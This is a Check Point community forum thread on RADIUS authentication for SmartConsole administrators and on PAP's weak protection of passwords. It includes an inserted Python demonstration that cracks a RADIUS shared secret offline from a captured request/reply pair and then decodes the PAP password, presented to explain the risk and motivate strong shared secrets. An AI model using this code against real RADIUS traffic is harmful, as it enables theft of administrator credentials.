Keld_Norman
Contributor

Check Point Radius Access to SmartConsole with no local user

Hi CheckMates,

I am looking into RADIUS authentication of an AD user to allow login to SmartDashboard.

Is it possible to give an AD user access to SmartDashboard using RADIUS without having to add it first in Manage & Settings -> Permissions & Administrators -> Administrators?

My wish is to have a group in Active Directory that I can add an AD user to, and then he/she can log in to the SmartDashboard.

If that is not possible and I HAVE TO use a local user, then I want to associate one Check Point local user (it could be a user called radius_admin) with all users that try to log in to the SmartDashboard. If the user is approved in AD/RADIUS then the login is allowed. Can this be done?


Best regards

Keld Norman

Nüüül
Advisor

Hi,

Two years ago I tried a similar thing on 77.20 and ended up creating the users and authorizing them with the built-in groups. The password came from RADIUS.

Regarding this:

Security Management R80.20 Administration Guide

It did not change, neither for TACACS nor SecurID.

Keld_Norman
Contributor

Thanks Daniel Meier :)

Was it for administrators to access the SmartDashboard that you made that setup, or for VPN or other services for users?

By the way, a note about RADIUS for SSH and WebGUI access:

    I found that the setup in the WebGUI only supports PAP by default (also known as RFC 1334), where credentials are transmitted from the RADIUS client in plain text, or rather, it XORs the password with an MD5 hash based on the shared secret and transmits that to the RADIUS server.

(So I did not configure that, to avoid creating a security risk and failing compliance checks.)

Nüüül
Advisor

Hi,

I did it for authenticating administrators. Ended up with SafeNet token authentication :)

For VPN I either ended up with LDAP only, or using a Cisco ASA, as it is more flexible.

Cheers

Daniel

Darren_Fine
Collaborator

Hi guys,

 

I was researching using RADIUS for SmartConsole logins and the security risk thereof.

Like you guys mentioned, the PAP protocol seems to allow the MD5 hash to be cracked somewhat easily, which would reveal the password, so it's a good idea to use a dynamic one-time password.

So if that is the case, is it better to only auth with the one-time password?

(I was originally going to use a <userstore password>+<1 time token> combination, but if this can be viewed then surely it's safer to just use the <1 time token>, because it won't be valid anymore.)

I hope the above makes sense 🙂

Regards

PS: <the above SmartConsole issue doesn't seem to be a problem with VPNs, since the 1st factor is via the user store and the second auth via RADIUS can be just the one-time token password, and this won't matter if it is decrypted since it won't be valid again>
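To make concrete what Keld's note on PAP over RADIUS and Darren's follow-up are discussing, here is an added example (written for this page, not code from the thread or from Check Point) in Python. It implements the RFC 2865 User-Password hiding (the MD5-keystream XOR Keld describes), builds a constructed Access-Request / Access-Accept pair, and then shows what an attacker with a capture of that pair can do: verify shared-secret guesses offline against the Response Authenticator, and, once the secret is known, unhide the PAP password. The shared secret, user name, request authenticator and wordlist are all constructed for the demonstration; a real client uses 16 random bytes for the Request Authenticator.

```python
import hashlib
import struct
from typing import Optional

# Constructed values for the demonstration: a deliberately weak shared secret,
# a fixed Request Authenticator (real clients use 16 random bytes) and a small
# candidate wordlist an attacker might try offline.
SECRET = b"checkpoint123"
REQ_AUTH = bytes(range(16))
WORDLIST = [b"secret", b"radius", b"password", b"checkpoint123", b"Welcome1"]

USER_NAME, USER_PASSWORD, REPLY_MESSAGE = 1, 2, 18   # RFC 2865 attribute types
ACCESS_REQUEST, ACCESS_ACCEPT = 1, 2                 # RFC 2865 packet codes


def hide_password(password: bytes, secret: bytes, req_auth: bytes) -> bytes:
    """RFC 2865 section 5.2: pad to 16-byte blocks and XOR each block with
    MD5(secret + previous ciphertext block); the first 'previous block' is
    the Request Authenticator. This is the only protection PAP gives."""
    padded = password + b"\x00" * (-len(password) % 16)
    out, prev = b"", req_auth
    for i in range(0, len(padded), 16):
        keystream = hashlib.md5(secret + prev).digest()
        block = bytes(p ^ k for p, k in zip(padded[i:i + 16], keystream))
        out += block
        prev = block
    return out


def reveal_password(hidden: bytes, secret: bytes, req_auth: bytes) -> bytes:
    """Inverse of hide_password: regenerate the keystream and XOR it back.
    Anyone holding the shared secret and the captured packet gets cleartext."""
    out, prev = b"", req_auth
    for i in range(0, len(hidden), 16):
        keystream = hashlib.md5(secret + prev).digest()
        block = hidden[i:i + 16]
        out += bytes(c ^ k for c, k in zip(block, keystream))
        prev = block
    return out.rstrip(b"\x00")  # drop the RFC padding; passwords never contain NUL


def attr(atype: int, value: bytes) -> bytes:
    """Type-Length-Value encoding of one RADIUS attribute."""
    return struct.pack("!BB", atype, len(value) + 2) + value


def packet(code: int, ident: int, authenticator: bytes, body: bytes) -> bytes:
    """Code(1) Identifier(1) Length(2) Authenticator(16) Attributes."""
    return struct.pack("!BBH", code, ident, 20 + len(body)) + authenticator + body


def response_authenticator(code: int, ident: int, body: bytes,
                           req_auth: bytes, secret: bytes) -> bytes:
    """RFC 2865 section 3: MD5(Code+ID+Length+RequestAuth+Attributes+Secret)."""
    header = struct.pack("!BBH", code, ident, 20 + len(body))
    return hashlib.md5(header + req_auth + body + secret).digest()


def parse_attrs(pkt: bytes) -> dict:
    """Walk the attribute list of a packet into {type: value}."""
    attrs, pos = {}, 20
    length = struct.unpack("!H", pkt[2:4])[0]
    while pos < length:
        atype, alen = pkt[pos], pkt[pos + 1]
        attrs[atype] = pkt[pos + 2:pos + alen]
        pos += alen
    return attrs


def crack_secret(access_request: bytes, access_accept: bytes, wordlist) -> Optional[bytes]:
    """Offline dictionary attack: the Response Authenticator of a captured
    reply lets an attacker check shared-secret guesses without any further
    traffic. Returns the matching candidate or None."""
    req_auth = access_request[4:20]
    resp_auth = access_accept[4:20]
    length = struct.unpack("!H", access_accept[2:4])[0]
    body = access_accept[20:length]
    for candidate in wordlist:
        if hashlib.md5(access_accept[:4] + req_auth + body + candidate).digest() == resp_auth:
            return candidate
    return None


def demo(password: bytes = b"Pa55w0rd!", wordlist=WORDLIST) -> tuple:
    """Client sends a PAP login, server accepts, attacker works from the capture."""
    req_body = attr(USER_NAME, b"keld") + attr(USER_PASSWORD, hide_password(password, SECRET, REQ_AUTH))
    access_request = packet(ACCESS_REQUEST, 7, REQ_AUTH, req_body)
    acc_body = attr(REPLY_MESSAGE, b"Welcome")
    access_accept = packet(ACCESS_ACCEPT, 7,
                           response_authenticator(ACCESS_ACCEPT, 7, acc_body, REQ_AUTH, SECRET),
                           acc_body)
    secret = crack_secret(access_request, access_accept, wordlist)
    recovered = None
    if secret is not None:
        recovered = reveal_password(parse_attrs(access_request)[USER_PASSWORD], secret, REQ_AUTH)
    return secret, recovered


if __name__ == "__main__":
    print(demo())
```

What the run shows is that nothing about the password's own MD5 gets "cracked": the weak link is the shared secret, which one captured request/response pair lets an attacker brute-force offline, after which every PAP password carried over that client/server pair is readable. That supports Darren's conclusion in one respect (a one-time token limits what a single capture is worth) but not in another: the same shared secret normally covers all accounts on that RADIUS client, so a long random secret is the control that actually stops the attack, and a reusable static password should not be sent this way at all.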
Alon_Alapi
Employee Alumnus

Hi,

I have a customer RFE that will probably meet your requirements.

Please contact me offline (alonal@checkpoint.com) and we will take it from there.

 

Thanks,

Alon

Michal_Gans
Contributor

Hello,

 

Is there any progress with the RFE? A customer asked me for something similar.

 

Thanks

Alon_Alapi
Employee Alumnus

Hi,

I suggest continuing this discussion via email (alonal@checkpoint.com).

Thanks,

Alon

spaceForceOne
Participant

Did you manage to get this working (without creating individual administrator accounts on Check Point)?
